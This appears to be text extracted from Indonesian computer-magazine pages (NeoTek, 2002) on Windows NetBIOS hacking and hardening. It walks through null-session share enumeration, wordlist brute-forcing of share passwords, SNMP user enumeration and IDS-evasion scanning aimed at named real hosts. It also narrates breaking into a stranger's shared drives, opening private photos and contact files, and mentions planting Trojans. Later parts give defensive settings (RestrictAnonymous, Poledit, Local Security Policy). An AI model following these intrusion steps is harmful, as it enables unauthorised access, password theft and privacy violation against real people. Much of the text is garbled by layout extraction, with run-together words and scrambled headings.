Nah! Kini anda sudah menjadi hacker hanya dengan meng-gunakan fasilitas yang sudah ada pada sistem operasi Win-dows itu sendiri (sedikit dibantu dengan utilitas sederhananbtscan). Setelah memahami dasar-dasarnya, kini kita lihatbagaimana enumerasi share NetBIOS itu dapat diotomatisasi.

Enumerasi Share dengan Legion, NAT, SharesFinderLegion v.1.2

Legion dapat dengan mudah mengenumerasi suatu rangeIP Address. Kalau kita klik ganda pada share yang terdapatpada window pane kiri, maka bila null-session dapat dilak-sanakan, share itu akan langsung di-mapping ke sistem ki-ta. Adapun bila share itu dilindungi password, Legion akanmenawarkan apakah akan mencoba menebak password itudengan Brute Force tool yang telah tersedia. Untuk menja-lankan Brute Force tool, anda harus mempunya daftar kata(dictionary) yang juga disediakan pada CD NeoTek.

Sekali remote share itu telah di-mapping, maka share itumenjadi 'milik' anda. Anda dapat meng-copy file dari situ

NeoTekno

Juli 2002 NeoTek 29

Nimda Worm

ke komputer anda, mengirimkan file ke share itu (mungkinTrojan?), atau bahkan menghapus file yang ada di dalam-nya. Namun hati-hati, mungkin saja share itu merupakandrive yang justru mengandung jebakan seperti adanyanimda worm yang didapatkan sewaktu redaksi NeoTek'iseng' masuk ke dalamnya.

NetBIOS Auditing Tool (NAT)

NetBIOS Auditing Tool (NAT) merupakan Windows sharescanner yang juga popular. Dibuat berdasarkan kode karyaAndrew Tridgell dan dapat diperoleh dari www.hacking-exposed.com atau dalam CD NeoTek bulan ini. NAT bukansaja mendapatkan share, namun juga berusaha masukberdasarkan daftar user name dan password yang telahditetapkan. NAT tersedia untuk Windows NT maupunLinux (tidak terdapat versi untuk Windows 95/98/ME).

SharesFinder

Terdapat pula SharesFinder, utility seperti Legion yangtidak terlalu popular (terdapat pada CD NeoTek bulan ini).Seperti juga Legion, apabila kita double click pada share(window pane kanan) maka bila null session dapat dilaku-kan, share itu langsung di-mapping ke komputer kita.

SMBScanner

NeoTekno

30 NeoTek Juli 2002

SMBScanner men-scan SMB share, baik berupa file mau-pun printer pada Windows (NetBIOS share) maupun Linuxbox yang menjalankan Samba (Samba share). SMBScannerselain menampilkan juga printer, juga memberi tanda apa-kah share itu dapat diakses atau tidak. Hasil scanning ter-hadap IP range yang sama antara Legion dan SMBSharemenunjukkan perbedaan itu. SMBScanner juga mampumelaksanakan mapping terhadap remote share ke kompu-ter local selain juga fasilitas Brute Force.

Pengamanan Terhadap Null-Session dan NetBIOSEnumarationPengamanan Windows NT/2000Karena null-session memerlukan akses ke port TCP 139(dan/atau UDP 445 pada Windows 2000), maka cara yangpaling tepat untuk mencegah masuknya intruder adalahdengan memfilter TCP port 139 dan UDP port 445. Dapatjuga men-disable sama sekali SMB service pada host NTtertentu dengan jalan meng-unbinding WINS client (TCP/IP) lewat Network Control Panel. Pada Windows 2000 halini dapat dilakukan dengan unbinding File and Print Sharingfor Microsoft Network dari adapternya pada aplet Networkand Dial Up Connection → Advanced → Advanced Settings.

Microsoft kini menyediakan fasilitas untuk mencegah null-session tanpa harus secara radikal melakukan unbindingSMB dari interface network, yang disebut Restrict Anonym-ous (mengikuti nama Registry key-nya):

1. Buka regedit32, cari entriHKLM\SYSTEM\CurrentControlSet\Control\LSA

2. Pilih Edit > Add value dan masukkan data berikut:Value Name: RestrictAninymousData Type: REG_DWORDValue: 1 (atau 2 untuk Win 2000)

3. Exit dari Registry Editor dan restart komputer yangbersangkutan.

Value 1 di atas sebenarnya tidak memblokir koneksi anonymous,melainkan hanya mencegah bocornya informasi yang biasanyadapat diperoleh melalui null-session, khususnya enumerasiutama yaitu usaha mendapatkan user account dan share.Pada Windows 2000, implementasi pengamanan ini mudahdilakukan karena adanya Security Policies yang dapat disetelpada tingkat Organizational Unit (OU), tingkat situs, atau-pun tingkat domain. Informasi lebih jauh tentang RestrictAnonymous dapat diperoleh pada Article Q143474 padahttp://search.support.microsoft.com. Juga dapatkan artikeltulisan Hobbit di http://www.avian.org mengenai hackingNetBIOS yaitu 'CIFS: Common Insecurities Fail Scrutiny.'

Pengamanan Windows 95/98/ME

Pada Windows 95/98/MEyang tidak memiliki fasi-litas Restrict Anonym-ous, jangan lupa mene-tapkan password terha-dap share. Karena pass-word dapat ditebak de-ngan menggunakan BruteForce tool yang disedia-kan pada Legion, makatetapkan password yangtidak lazim seperti me-nambahkan karakter-karakter yang tidaklazim. Itupun masih bisa

ditebak dengan menyiapkan daftar password menggunakanpassword generator yang digunakan sebagai teks input bagiBrute Force tool.

Cara yang sederhana adalah membuat share anda tidakterdeteksi oleh NetBIOS scanner. Caranya ternyata mudahsaja. Tambahkan tanda $ di belakang Share Name, makashare itu tidak tampak dan tidak menghasilkan output padakebanyakan NetBIOS scanner.

Bahaya Lain terhadap NT/2000Walaupun NetBIOS service sudah diamankan baik-baik,sistem NT/2000 masih mungkin membocorkan informasiyang serupa apabila server itu menjalankan Simple Net-work Management protocol (SNMP) yang dapat diaksesdengan memberikan default community string yangbiasanya berupa teks 'public.'

Untuk mengenumerasi user pada sistem NT/2000 digu-nakan snmputil yang terdapat pada NTRK denganperintah:

C:\>snmputil walk 203.125.135.46 public .1.3.6.1.4.1.77.1.2.25

Deretan angka di bagian akhir sintaks (.1.3.6.1.4.1.77.1.2.25)disebut object identifier (OID), yang akan menampilkanMIB subtree pada Microsoft enterprise ManagemnetInformation Base (MIB), sebagai yang didefinisikan padaprotocol SNMP. MIB adalah name space hierarkis, yangberarti kita dapat berjalan 'ke atas' tree (ke nomor yanglebih umum dan mendapatkan lebih banyak lagi informa-si), misalnya dengan mengetikkan angka yang lebih tidakspesifik (misalnya .1.3.6.1.4.1.77).

Selain dengan mengetikkan teks dengan snmputil, terdapatpula SNMP Browser yang menampilkan secara grafisinformasi di atas. Contoh SNMP browser adalah SolarWinds,yang beberapa versinya tersedia juga di CD NeoTek.

NeoTekno

Juli 2002 NeoTek 31

SideStep

Fasilitas SNMP browser juga terdapat pada SideStep suatuvulnerability scanner yang menyediakan cara untukmenghindari pengamatan dari Intrusion Detection System(IDS). SideStep dijalankan lewat command line DOSdengan switch -evade (menghindari pengawasan IDS) danswitch -snmp untuk melihat apakah terdapat SNMPvulnerability pada server ini.

C:\>sidestep 202.134.2.15 -evade -snmp

Mencoba memeriksa apakah ada kelemahan SNMP padaserver www.telkom.co.id dengan menghindari pengawasanIDS (Intrusion Detection System). IDS dengan menggu-nakan Snort akan dibahas di NeoTek Agustus 2002.

NeoTekno

32 NeoTek Juli 2002

Enumerasi NT/2000 Domain Controller

Untuk mengenal lebih dalam struk-tur network pada NT, gunakan nltest.exe suatu tool yang ada pada NT Re-source Kit (NTRK). Nltest.exe akanmengenali Primary Domain Control-ler maupun Backup Domain Control-ler (PDC dan BDC) dalam suatu domain.

Selanjutnya kita harus melaksanakannull-session pada mesin NT itu. Sete-lah null-session terlaksana pada do-main yang terenumerasi, maka selan-jutnya gunakan sintaks nltest/server:<server_name> dan/trusted_domain untuk mempe-lajari domain NT ini lebih dalam.

Kita tidak akan membahas lebih jauhtentang Domain Controller ini. In-formasi selanjutnya dapat dilihat darisitu support Microsoft dihttp://support.microsoft.com/default.aspx?scid=kb;EN-US;q158148

Enumerasi Share dengan DumpSec(DumpAcl)

Salah satu tool terbaik untuk enume-rasi share pada NT adalah DumpSec(dulu DumpAcl), dapat diperoleh darisitus Somarsoft (www.somarsoft.com)atau dari CD NeoTek. DumpSec hanyaberjalan pada NT.

Enumerasi Share dengan net view danRK Tools

Dengan terlaksananya null-session,pada NT kita juga dapat mengguna-kan net view untuk meng-enumerasishare pada suatu remote system. Pa-da NTRK terdapat tiga share-enum-eration tool yang bagus yaiturmtshare, srvcheck, dan srvinfo(menggunakan switch -s). Rmtsharemenghasilkan output serupa dengannet view. Srvcheck menampilkanshare dan authorized user-nya, ter-masuk juga share yang disembunyi-

kan, namun srvcheckmembutuhkan aksesprivilege ke remotesystem untuk dapatmengenumerasi userdan hidden share.Srvinfo -s menampil-kan daftar share ber-sama dengan banyakinformasi potensiallain.

Windows NT/2000Enumeration Tool Lain

Beberapa enumera-tion tool yang dapatanda coba di anta-ranya epdump dariMicrosoft (http://packetstorm. security.com/NT/audit/epdump.zip), getmacdan netdom (dariNTRK), netviewx karya JesperLauritsen (http:// www.ibt.ku.dk/jesper/ Nttools), winfo dariArne Vidstorm (http://www.ntsecurity.nu), dan nbtdump dariDavid Litchfield (http://www.cerberus-infosec.co.uk/toolsn.shtml).

Epdump melacak RPC endpoint map-per dan menunjukkan service yangterkait pada IP Address dan portnumber-nya.

Dengan menggunakan null-session,getmac menampilkan MAC Addressdan device name dari suatu networkinterface card pada suatu remotemachine. Ini dapat menghasilkan in-formasi tentang network yang ber-manfaat bagi hacker.

Netdom lebih bermanfaat lagi, meng-enumerasi informasi kunci tentangNT domain, termasuk domain mem-bership dan identitas dari berbagai

Backup Domain Controller.

Netviewx juga merupakan tool untukmenampilkan daftar simpul-simpulpada domain serta service apa yangdijalankan oleh setiap simpul (node)tersebut. Netviewx sering digunakanuntuk memeriksa NT Remote AccessService (RAS) untuk mendapatkan

gambaran mengenai banyaknya dial-in server yang terdapat pada network.

Winfo mengekstraksi user accounts,shares, interdomain, server, danworkstation trust accounts. Null-session juga dapat diotomatisasidengan switch -n.

Nbtdump menciptakan null-session,mengenumerasi share dan useraccount, dan menyajikan laporannyadalam format HTML yang rapih.

Enumerasi Lebih Lanjut Terhadap Windows NT

NeoTekno

Juli 2002 NeoTek 33

Tool Networking TCP/IP Sederhana pada Windows 9x

ita mungkin tidak menya-dari bahwa pada sistem ope-rasi Windows 9x yang kita

miliki sudah terdapat beberapa toolsederhana untuk networking berbasisTCP/IP. Tentu saja yang lebih leng-kap memang bila anda temukan diLinux, karena TCP/IP memang“bahasa ibu”-nya Linux. Beberapaperintah yang disediakan Windowsadalah winipcfg, ipconfig, ping, arp,tracert, dan netstat. Akan kita lihatinformasi apa yang bisa diperolehdari perintah-perintah itu.

Perintah-perintah itu bisa anda jalan-kan pada jendela MS-DOS promptpada Windows, atau melalui menuStart → Run. Tentu saja kegunaanperintah akan lebih nampak bila kom-puter anda terhubung ke Internet,maupun terhubung ke PC lainnyalewat jaringan LAN. Diasumsikan disini protokol TCP/IP sudah terinsta-lasi pada Windows anda

WinipcfgDengan perintah ini anda bisa meli-hat konfigurasi perangkat jaringanyang ada berikut alamat IP-nyamasing-masing. Kalau misalkan andasedang terhubung ke Internet, andabisa melihat alamat IP yang diberikanoleh ISP pada dial-up adapter anda.Seperti kita ketahui kalau anda ter-hubung ke ISP dengan cara dial-upmaka alamat IP anda akan di-assignoleh ISP secara dinamis (berbeda-beda setiap kali anda connect). Bebe-rapa ISP juga secara otomatis mem-berikan alamat Server DNS danGateway tanpa anda harus men-setnya.

Bila anda memiliki card LAN/ Ether-net, anda juga bisa melihat alamatfisik dari card jaringan anda. Sebenar-nya setiap card Ethernet yang dipro-duksi memiliki alamat fisik yangunik. Alamat fisik tersebut dinyata-kan dalam heksadesimal terdiri darienam byte, dimana tiga byte pertamamenyatakan kode pabrik pembuatnya.Misalkan saja card Ethernet merkCompex yang saya punya memilikialamat fisik: 00-80-48-E2-49-BA,maka kode pembuatnya adalah 00-80-48. Bila ada teman saya yang jugamemiliki card merk Compex, makatiga byte pertama dari alamat fisikcard bisa sama, tetapi tiga byteterakhir berbeda. Artinya dijamintidak ada dua card Ethernet yangmemiliki alamat fisik yang sama(seharusnya).

Ipconfig

Perintah ini hasilnya serupa denganWinipcfg, hanya keluarannya di sinidalam mode teks. Untuk melihat in-formasi konfigurasi yang lebih leng-kap anda bisa menggunakan perintah:Ipconfig /all. Kalau anda kesulitanmembaca hasilnya karena scroll yangcepat, anda bisa meletakkan output-nya ke suatu file. Misalkan anda inginhasil perintah diletakkan ke file ber-nama output.txt maka perintah yanganda gunakan:C:\>ipconfig /all /batch output.txt.File output.txt merupakan file teksbiasa yang bisa dibaca dengan pro-gram editor teks seperti Notepad.

PingPerintah paling mendasar yang biasadigunakan untuk mengamati konek-tivitas/keterhubungan dan kinerjajaringan. Ada beberapa kemungkinanhasil dari perintah ping, misalkan sajaanda melakukan perintah:C:\>ping yahoo.com

Bila DNS server dapat menemukanserver yahoo.com dan server yahoo.com sedang aktif, maka akan diberikanjawaban yang menginformasikanalamat IP dari yahoo.com serta delay(dalam satuan milisekon) yaitu wak-tu yang dibutuhkan untuk memper-oleh jawaban. Dari delay tersebutanda dapat mengetahui kinerja jaringan.

Bila DNS server dapat menemukanserver yahoo.com, tetapi serveryahoo.com sedang tidak aktif (kapanya…?), atau koneksi lewat ISP andaterlalu lambat (biasanya inipenyebabnya) maka pesan yangmuncul biasanya adalah: Requesttime out, artinya kira-kira sudahterlalu lama untuk menunggujawaban.

Bila pesan yang muncul: Unknownhost, berarti DNS server anda tidakbisa menemukan alamat IP serveryang dimaksud (coba sajalah lakukanperintah semacam: ping embuh.gakweruh.com), kemungkinan lainkomputer anda yang tidak menemu-kan DNS servernya (perlu andasetting dulu alamat DNS yang diacuoleh komputer anda).

Anda juga bisa melakukan perintahping langsung dengan alamat IP-nya.Misalkan saja anda memiliki jaringanlokal dengan private address (untuksharing internet dengan teman kostanda?) anda melakukan semacam :ping 192.168.0.1

Tracert

Perintah ini bisa anda gunakan untukmelacak route untuk sampai ke suatuserver. Seperti anda ketahui Internetpada dasarnya terdiri dari banyak kom-puter yang saling terhubung. Di sinianda bisa melihat bagaimana perjalanan"paket" anda untuk sampai ke serveryahoo.com misalnya dengan perintah

C:\>tracert yahoo.com.

Hasil yang diberikan akan menunjuk-kan server-server mana saja yang di-lewati oleh "paket" anda. Di sini dibatasimaksimal sampai 30 simpul/hop.

Arp (address resolution protocol)Bila sebelumnya dengan ipconfig kitabisa mengetahui alamat fisik card kita,maka arp memungkinkan kita menge-tahui alamat fisik card komputer lainyang terhubung dalam jaringan. Misal-kan anda ingin mengetahui alamatfisik dari card dengan IP 192.168.0.5pada jaringan, maka perintahnya:

C:\>arp -a 192.168.0.5

NetstatPerintah netstat memiliki beberapaoption yang penting:

netstat -e: akan menyajikan statis-tik jaringan, yaitu banyaknya paketyang dikirim dan diterima.

netstat -r: menunjukkan isi tabelrouting. Efeknya akan lebih kelihatanbila anda mencobanya saat terkoneksike internet.

netstat -a: menginformasikan akti-vitas port TCP/IP pada komputer anda.Seperti kita ketahui setiap aplikasiTCP/IP menggunakan nomor portyang berbeda. Setiap port bisa diang-gap sebagai sebuah jalur yang "men-dengarkan" (listening) apakah adarequest/permintaan ke port tersebut.Sebagai contoh nomor port defaultuntuk FTP=21, Telnet=23, Http=80.Misalkan di komputer anda diinstallaplikasi Personal Web Server (PWS),maka bila PWS anda jalankan akandidapati bahwa port nomor 80 dalamkeadaan aktif/listening. Perintah netstatini dapat pula kita manfaatkan untukmemantau kemungkinan adanya trojan/backdoor yang aktif di komputer kitapada suatu port.

Semoga dengan mencoba perintah-perintah sederhana di atas anda akanmemperoleh pemahaman yang lebihbaik mengenai jaringan baik LANmaupun Internet, khususnya yangberbasis TCP/IP.

KFirrar Utdirartatmo

34 NeoTek April 2002

6 CALON ‘MANGSA’ KITABuka MyComputer. Setelah di-mapsebagai drive lokal (pada contoh inidrive G sampai K), maka kita dapatmemperlakukannya sebagai milikkita sendiri. Kita dapat meng-copy,men-delete, ataupun kegiatanlainnya. Mengerikan bukan?

NeoTekno

MASUK LEBIH JAUHKita bisa mengeksplorasi isi dari sha-re ini. Wah! Ada foto pribadi. Janganketawa dulu. Tahukah anda bahwamungkin ada orang lain yang jugasedang mengintip komputer anda?Ingat dalam mengaktifkan share pa-da Network Neighborhood janganlupa pakai password!

SIAPA SIH SI CEROBOH INI?Dari dokumen yang ada kita bisamenduga siapa pemilik komputer ini,yang ternyata seorang dosen di NTU(Nanyang Technological University) diSingapore. Dosen dari School ofComputer Engineering lagi. Jangan-kan kita, dosen komputer saja bisaceroboh ya?

USER YANG BAIKKomputer 203.125.212.103 mem-punyai dua share yang dinamakanOFFICE dan MYDOCUMENTS.Double click Folder MyDocumentsini yang ternyata diproteksi olehpassword. Klik No untuk menjawabpertanyaan apakah ingin mengujikekuatan password ini.

MAPPING KE DRIVE LOKALKlik dua kali share dengan namaSHAREDOCS. Legion langsung me-map share itu menjadi drive lokal dikomputer kita. Dalam hal ini dijadi-kan Drive G. Coba lagi share-shareyang lain. Apabila null-session iniberhasil maka share itu langsung di-map sebagai drive lokal.

4

10 11

5

Menunjukkan betapa berbahayanya file sharing pada Windows

FOLDER YANG DIPROTEKSIWalaupun sudah berhati-hati danshare-nya diproteksi dengan pass-word, masih saja ada bahaya. Kitakembali ke share yang diproteksidengan password tadi. Kali ini klikYes untuk menguji kekuatan pass-word-nya.

12

LELEGGIIOON V2.N V2.11GGAMAMPPANANG KG KOOK JK JALALAN-JAN-JALALANANKKE KE KOOMMPPUUTTEER OR ORRANANGGFile sharing pada Windows (fasilitas NetBIOS) banyak dimanfaatkanoleh para pemilik home network. Sementara mudah digunakan dannyaman, ternyata fasilitas ini sangat rentan terhadap penyusupan.Bagaimana tidak, kalau fasilitas Network Neighborhood ini benar-benardimanfaatkan oleh tetangga yang tidak diundang!

ools untuk mengintip sharepada network ini amat mudahpenggunaannya. Enumation

tool yang untuk LAN ini dapat jugauntuk IP Address secara umum!

Lebih parah lagi bila share resourceitu tidak dilindungi password, makalangsung dapat di-mapping sebagaidrive lokal sang intruder. Adanyapassword juga bukan jaminan karenaLegion dilengkapi Brute Force tool,yaitu alat bantu untuk menebakpassword menggunakan daftar katadari kamus atau password generator.

Awas! Bila anda mencoba softwareini, lindungi dulu komputer andadengan antivirus.

T

April 2002 NeoTek 35

NeoTekno

BRUTE FORCE TOOLLegion mempunyai kelebihan di-banding NetBIOS scanner lain, yaituadanya fasilitas untuk menebakpassword (Brute Force tool). Tampiljendela Force Share yang akanmenebak password pada share\\203.125.212.103\MYDOCUMENTS

ADD WORD LISTSebelumnya diasumsikan anda telahmenginstalasi Word List yang jugadisediakan di CD NeoTek. PadaForce Share klik Add dan jendelaAdd Word List akan tampil. Browseke folder penyimpanannya. Klikpada file-file teks ini dan setiap kaliklik Open.

BUKA SALAH SATU FOLDERCoba kita buka salah satu foldermangsa kita ini. Pada contoh inikita buka folder OFFICE padakomputer dengan IP Address203.125.212.103 yang sudah di-mapping sebagai drive H: dikomputer kita. Klik dua kali driveitu. Ada dua folder di sana.

INVASION OF PRIVACYKlik dua kali lagi folder personaluntuk melihat isinya. Anda tahubahwa tidakan ini sudah me-rupakan pelanggaran hak pribadiorang? Ibarat ada rumah orang yangpintunya terbuka lebar. Masuk kedalamnya tetap merupakan pe-langgaran. Masih mau terus?

7

13 14

8 AHA! ADA FILE EXCELAda beberapa file Excel di sini. Masihmau mengintip terus. OK kita terus-kan. Klik dua kali file dengan namaContact. Nah, bocor deh datapekerjaan ‘mangsa’ kita ini. Andabisa saja men-sabotase denganmengubah data yang ada atau bah-kan menghapusnya. Jangan ah!

9

MENEBAK PASSWORDProses menebak password pun berjalansecara otomatis. Bila kurang beruntungdengan daftar kata ini cari lagi kamus-kamus lain. Ada berbagai macam kamusyang disediakan dalam CD NeoTek kaliini untuk eksperimen anda menebakpassword dengan Brute Force.

15

NODE AKTIF DENGAN SHARE-NYATernyata dari 256 IP Address yangdi-scan NetBIOS-nya itu terdapat 4host dengan 6 share. Ini adalah 4komputer yang terhubung ke Inter-net pada range IP Address yangtadi serta mengaktifkan resourcesharing dengan windows network.

2SCANIPADDRESS RANGEJalankan Legion v2.1 yang diinstaldari CD NeoTek bulan ini. Pada con-toh ini kita akan men-scan range IPAddress 203.125.212.0 sampai203.125.212.255. Anda tentunyadapat men-scan range apa saja.Klik Start dan scanning dimulai.

1 SHARE PADA TIAP NODEKlik tanda plus (+) di sebelah kiriikon komputer, maka share padakomputer itu akan ditampilkan dibawahnya. Kita akan mulai meme-riksa para calon ‘mangsa’ kita.Mana saja yang ceroboh sehinggamudah dimasuki tanpa permisi.

3

NeoTekno

36 NeoTek Juli 2002

kibatnya dari kelemahan sistem operasi keluaranMicrosoft itu, maka siapa pun yang mengoperasikandapat mem-browse, menghapus data atau program,

melakukan dial-up ke ISP, dan menjalankan semua aplikasiyang ada di dalam hard disk anda, termasuk mengubah set-ting dan konfigurasi sistem yang sudah diatur sebelumnya.

Meskipun secara teknis sebenarnya kita dapat membuat userprofile untuk pemakai lain dan mengharuskan mereka me-lakukan login terlebih dahulu berdasarkan identitas yangsudah ditentukan pada profile masing-masing, hal itu ter-nyata tetap tidak terlalu bermanfaat. Walau bagaimanapunpemakai lain masih dapat melakukan apa saja pada semuaresource yang ada di dalam komputer kita. Oleh karena itu,tidak mengherankan jika sistem operasi Microsoft Windowssangat rentan terhadap kesalahan yang dilakukan olehorang lain, baik disengaja maupun tidak.

Untuk mengatasi persoalan tersebut di atas, atau dengankata lain untuk membatasi pengguna lain mengaksessumber daya di komputer anda, anda dapat menggunakanprogram Poledit (Policy Editor). Poledit adalah programeditor yang digunakan untuk menyunting konfigurasi/setting registry yang tersimpan dalam file USER.DAT danSYSTEM.DAT. Program ini dapat anda temukan dalamdirektori sebagai berikut :

\Admin\Apptools\Poledit(Pada CD installer MS Window 95)

\Tools\Reskit\Netadmin\Poledit(Pada CD installer MS Windows 98)

Jika program tersebut tidak ada di dalam CD installer MSWindows anda, maka anda dapat men-download-nya de-ngan gratis dari beberapa situs di bawah ini:

http://support.microsoft.comhttp://msdn.microsoft.comhttp://lycos.co.uk/tricksy/poledit

Dengan Poledit anda dapat melakukan beberapa hal pada 5properti Windows berikut:

Control PanelMembatasi pemakai lain sehingga tidak mengakses komponen-komponen yang ada di dalam Control Panel. Adapunproperti yang dapat anda kunci agar tidak dapat diaksespengguna lain adalah:

Display (Restrict Display Control Panel)

[√] Disable Display Control PanelMenonaktifkan fungsi klik kanan tombol mouse dilayar desktop.

[√] Hide Background pageMencegah pemakai mengatur setting gambar latarbelakang desktop (Wallpaper).

[√] Hide Screen Saver pageMencegah pemakai mengatur setting Screen Saver.

[√] Hide Appearance pageMencegah pemakai mengatur Scheme, Item, dan Font.

[√] Hide Settings pageMencegah pemakai mengatur setting resolusi danScreen area.

Network (Restrict Network Control Panel)

[√] Disable Network Control PanelMencegah pemakai mengakses menu propertiesNetwork Neighborhood.

[√] Hide Identification pageMencegah pemakai mengisi atau mengubah nilai field

PPolicy Editorolicy EditorSebagai PSebagai Pelindung Melindung MS WindoS Windowsws

Salah satu kelemahan Windows 95/97/98/2000/ME jika dioperasikan secara default adalah ketakmam-puannya membatasi pengguna lain mengakses seluruh sumber daya yang ada di dalam hard disk. Eryanto

Sitorus memberi tip cara melindungi komputer anda dengan Policy Editor.

A

Properti pada jendela ‘Display Properties.’

NeoTekno

Juli 2002 NeoTek 37

Computer name, Workgroup, dan ComputerDescription.

[√] Hide Access Control pageMencegah pemakai mengatur setting terhadap metodeyang digunakan untuk mengakses sumber dayajaringan.

Password (Restrict Password Control Panel)

[√] Disable Passwords Control PanelMencegah pemakai mengakses komponen Password.

[√] Hide Change Passwords pageMencegah pemakai mengubah setting password userprofile.

[√] Hide Remote Administration pageMencegah pemakai mengakses fungsi administrasijarak jauh.

[√] Hide User Profiles pageMencegah pemakai mengakses konfigurasi user profile.

Printer (Restrict Printer Settings)

[√] Hide General and Details pagesMenyembunyikan kotak tab General dan Detailsproperti Printer.

[√] Disable Deletion of PrintersMencegah pemakai menghapus komponen printeryang sudah diinstal.

[√] Disable Addition of PrintersMencegah pemakai menambah/menginstal printer.

System (Restrict System Control Panel)

[√] Hide Device Manager pageMenyembunyikan kotak tab Device Manager pada

jendela System Properties.

[√] Hide Hardware Profiles pageMenyembunyikan kotak tab Hardware Profiles.

[√] Hide File System buttonMenyembunyikan tombol File System yang terdapatpada kotak tab Performance di bagian Advancedsettings.

[√] Hide Virtual Memory buttonMenyembunyikan tombol Virtual Memory yangterdapat pada kotak tab Performance di bagianAdvanced settings.

DesktopMembatasi pemakai lain untuk tidak mengakses settingproperti Desktop. Adapun properti yang bisa anda kunciadalah sebagai berikut:

[√] WallpaperFungsi ini sama dengan Hide Background Page, yaituuntuk mencegah pemakai mengatur setting gambarlatar belakang desktop (Wallpaper).

[√] Color SchemeMencegah pemakai mengatur konfigurasi Scheme padatab Appearance jendela Display.

NetworkMembatasi pemakai untuk tidak mengakses fasilitassharing yang terdapat pada komponen Network. Adapunfasilitas yang bisa Anda kunci adalah sebagai berikut :

Sharing[√] Disable file sharing controls

Menonaktifkan menu sharinguntuk bagi pakai file.

[√] Disable print sharing controlsMenyembunyikan printsharing dari NetworkNeighborhood.

ShellMembatasi pemakai untuk tidakmengakses program dalam modusshell Windows berserta fasilitas

Properti pada jendela ‘Network.’

Properti pada jendela ’System Properties.’

Komponen-komponen Control Panel yang dapat dikunci oleh Poledit.

Properti pada jendela ’Password Properties.’

Properti pada jendela ‘Printer.’

Menu file ‘Sharing.’

NeoTekno

38 NeoTek Juli 2002

lainnya. Adapun program dan fasilitas yang dapat Andakunci adalah sebagai berikut:

Custom Folders(Bagian ini tidak terlalu penting, Anda dapatmengabaikannya )

Restrictions

[√] Remove “Run” commandMenghilangkan menu Run dari menu Start.

[√] Remove folders from "Settings" on Start MenuMenghilangkan folder atau direktori menu Settingsdari menu Start.

[√] Remove Taskbar from “Settings” on Start MenuMenghilangkan menu Taskbar dan Start Menu darimenu Start → Settings.

[√] Remove “Find” commandMenghilangkan menu Find dari menu Start.

[√] Hide Drives in “My Computer”Menyembunyikan tampilan ikon drive hard disk,

floppy, dan CD-ROM dari jendela My Computer.

[√] Hide Network NeighborhoodMenyembunyikan ikon Network Neighborhood darilayar desktop.

[√] No “Entire Network” in Network NeighborhoodMengosongkan ikon Entire Network dan jendelaNetwork Neighborhood.

[√] No workgroup contents in Network NeighborhoodMengosongkan icon Workgroup dari jendela NetworkNeighborhood.

[√] Hide all items on DesktopMenyembunyikan semua ikon semua program aplikasidari layar desktop.

[√] Disable Shutdown commandMenonaktifkan menu Shutdown dari menu Start.

[√] Don't save settings at exitApa yang sudah di-setting oleh pemakai tidak akandisimpan dan akan diabaikan oleh sistem.

SystemMembatasi pemakai untuk tidak mengakses beberapaprogram, antara lain:

Restrictions[√] Disable Registry editing tools

Menonaktifkan program editor registry (REGEDIT.EXE).

[√] Disable MS-DOS prompt Menonaktifkan shell MS-DOS (COMMAND.COM).

[√] Disable single-mode MS-DOS applications Menonaktifkan semua program yang berjalan padamodus DOS.

Jendela ‘Browse for Printer.’ Di sini pun anda dapat membuat perlindungan.

Local Security Policy

Selain pengamanan dengan PolicyEditor (Poledit), komputer anda

perlu juga diamankan darikesalahan yang terjadi karena

ketidaksengajaan atauketidaktahuan pemakai, terutama

bila komputer dipakai bersama-sama orang lain. Andreas Jiman

membahasnya untuk anda.

ernahkah terpikirkan olehanda bagaimana caranya PCyang kita miliki boleh dipa-

kai oleh banyak orang tanpa perlukhawatir terjadi apa-apa dengansistem yang ada (Windows) ataukonfigurasinya. Salah satunya adalahmelakukan setting di PC lokal itusendiri menggunakan Local SecurityPolicy. Sebagai contoh akan dibahassetting pada Windows XP atauWindows 2K Professional.

Kalau kita ingin mengubah batasankeamanan sistem di PC kita, kliksaja Control Panel -> Adminis-

P

NeoTekno

Juli 2002 NeoTek 39

ADA PENJELASAN TERSEBUT DI ATAS, anda dapat mel-ihat bahwa ada banyak hal yang bisa anda lakukanuntuk melindungi sistem operasi Microsoft Windows

anda, dengan begitu maka kecil kemungkinan penggunalain dapat berbuat hal-hal yang tidak anda inginkan. Namunsebelum anda mulai menjalankan program Poledit, andasebaiknya melakukan beberapa hal tersebut di bawah initerlebih dahulu:

1. Buat backup untuk file berikut

USER.DATSYSTEM.DAT

(Ke dua buah file ini terletak dalam direktoriC:\WINDOWS). Tujuannya adalah untuk mengantisipasijika terjadi kesalahan pada saat Anda merubah registry.

2. Letakkan program Poledit ke dalam direktori yang tidakmudah dilihat oleh pengguna lain. Misalnya dalam direk-tori C:\WINDOWS\SYSTEM\POLEDIT. Jika perlu, andadapat menyimpannya ke dalam disket khusus.

Jika kedua hal tersebut di atas sudah anda lakukan, makasekarang anda dapat menjalankan Poledit. Berikut iniadalah langkah-langkah untuk mengoperasikannya:

Pengoperasian Poledit

P

Menentukan Lokasi File Template (ADMIN.ADM)Klik file POLEDIT.EXE. Pertama kali Anda men-jalankannya, program akan meminta anda untukmenunjukkan lokasi file template. File templateyang akan di load Poledit adalah ADMIN.ADM.

1 2 Objek Registry (Local User dan Local Computer)Setelah file template di-load, kemudian klik menuFile / Open Registry. Setelah itu akan terlihat duabuah objek registry, seperti tampak pada gambardi samping.

2

trative Tools -> Local SecurityPolicy seperti yang terlihat padagambar yang pertama.

Akan diperoleh tampilan selanjut-nya. Jika gambar ini berbeda dengantampilan di komputer anda, harapdiingat bahwa screen shot ini diambildi WindowsXP dan Windows2KProf.

Terlihat bahwa Security Settingdibagi atas lima katagori. UntukWin9x agak berbeda, yakni hanyaterdapat dua policy yaitu LocalPolicies dan Public Policies.

Terlihat pada screen shot initerdapat lima kategori:

Account PoliciesLocal PoliciesPublic Key PoliciesSoftware Restriction PoliciesIP Security Plicy on LocalComputer.

Sebelumnya pada WinNT dan Win9x, aplikasi Local Security Settingini masih kurang jelas kegunaannya,

NeoTekno

40 NeoTek Juli 2002

Mencegah menjalankan regedit dan command.comKini anda tinggal menentukan kebijakan (policy)apa yang ingin diimplementasikan pada sistemoperasi seperti yang dijelaskan pada kelima propertiyang terlihat pada Langkah 3. Misalnya, tidak inginorang lain menjalankan editor registry (REGEDIT.EXE)dan MS-DOS prompt (COMMAND.COM) di kompu-

